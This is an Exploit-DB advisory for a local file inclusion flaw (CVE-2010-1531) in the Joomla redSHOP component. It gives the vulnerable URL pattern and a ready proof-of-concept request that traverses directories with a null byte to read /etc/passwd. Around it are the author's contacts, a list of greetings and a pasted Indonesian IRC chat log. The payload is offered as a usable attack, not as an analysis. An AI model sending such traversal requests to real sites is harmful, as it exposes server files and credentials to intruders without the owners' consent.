Joomla Component redSHOP - Local File Inclusion Vulnerability

2010-04-04T00:00:00
ID EDB-ID:12054
Type exploitdb
Reporter NoGe
Modified 2010-04-04T00:00:00

Description

Joomla Component redSHOP Local File Inclusion Vulnerability♦. CVE-2010-1531. Webapps exploit for php platform

                                        
                                            
======================================================================================================================


  [o] Joomla Component redSHOP Local File Inclusion Vulnerability
 
       Software : com_redshop version 1.0.x [ commercial ]
       Vendor   : http://redcomponent.com/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
       Home     : http://antisecurity.org/


======================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_redshop&view=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00


======================================================================================================================


  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella pizzyroot
       H312Y yooogy mousekill }^-^{ noname matthews s4va stardustmemory
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


======================================================================================================================


  [o] Iklan Layanan Masyarakat

       -irc.******.net- *** Notice -- ander used SAJOIN to make wishnusakti join #channel
       <Jack> wew
       <Jack> ngapaen lu bedua di sini?
       <Jack> ck ck ck
       <@ander> kegiatan mafia
       <@wishnusakti> belajar broo ;))
       <@wishnusakti> nubi nih :(
       <Jack> sama dunk bro
       <Jack> aq ikut yak
       <Jack> mohon bimbingan na sesepuh
       <@wishnusakti> tuhh aku di ajarin ma ander-wear kok 
       <@wishnusakti> minta ma dia brooo 
       <Jack> ok bro
       <Jack> bro ander-wear.. ajarin dunk
       <@wishnusakti> jangan manggil gitu 
       <@wishnusakti> kamu di plorotin celananya nanti broo =))
       <Jack> jadi apa dong?
       <@wishnusakti> ander ku sayang :*
       <~zxvf> [06:27] * ~ander lagi dengerin [Akon - Right Now (Na Na Na)] Š [nob0dy] <=- kayak nya lg senenQ dia
       <&pizzy> lagi kasmaran dia 
       <&NoGe> lg berbunga² tuh
       <zxvf> icic

       ouw ouw kamu ketauan... wkakwakwkakwkwakwak... :p


======================================================================================================================